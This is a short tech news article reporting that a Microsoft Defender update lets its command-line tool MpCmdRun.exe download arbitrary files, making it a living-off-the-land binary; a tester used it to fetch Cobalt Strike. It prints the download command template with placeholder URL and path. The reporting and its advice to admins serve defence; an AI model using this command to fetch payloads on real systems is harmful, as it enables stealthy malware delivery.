A recent Microsoft Defender update means the Windows 10 antivirus software could have been used as a vessel through which to download malicious files from the web.
According to penetration tester Mohammad Askar, changes to the Microsoft Defender command line tool could allow attackers to use the software as a living-off-the-land binary (LOLBin).
Numerous LOLBins are present in Windows 10, all of which serve a legitimate function. However, with the right privileges, hackers can abuse these binaries to bypass security facilities and conduct attacks without alerting the victim.
- Here's our list of the best Windows 10 antivirus services around
- We've built a list of the best ransomware protection software available
- Check out our list of the best firewall out there
Windows 10 antivirus
As noted by Askar, the Microsoft Defender command line tool now supports a new “-DownloadFile” function. The change is thought to have taken effect with Microsoft Defender version 4.18.2007.9 or 4.18.2009.9.
As a result, an attacker on a local network could use the Microsoft Antimalware Service Command Line Utility to download a file from the internet with the following command: “MpCmdRun.exe -DownloadFile -url <url> -path <local-path>”.
Using this technique, Askar was able to download Cobalt Strike malware from a remote location directly via Microsoft Defender.
While Defender will detect and mitigate any malicious files downloaded using this method, it is unclear whether other popular antivirus services will be able to defend against this avenue of attack, in instances in which native protections have been disabled.
System administrators are advised to update their watchlists to include the new LOLBin, to ensure it is not used to mount an attack.
TechRadar Pro has asked Askar to advise on how individual users should set about protecting themselves but is yet to receive a response.
- Here's our choice of the best malware removal software on the market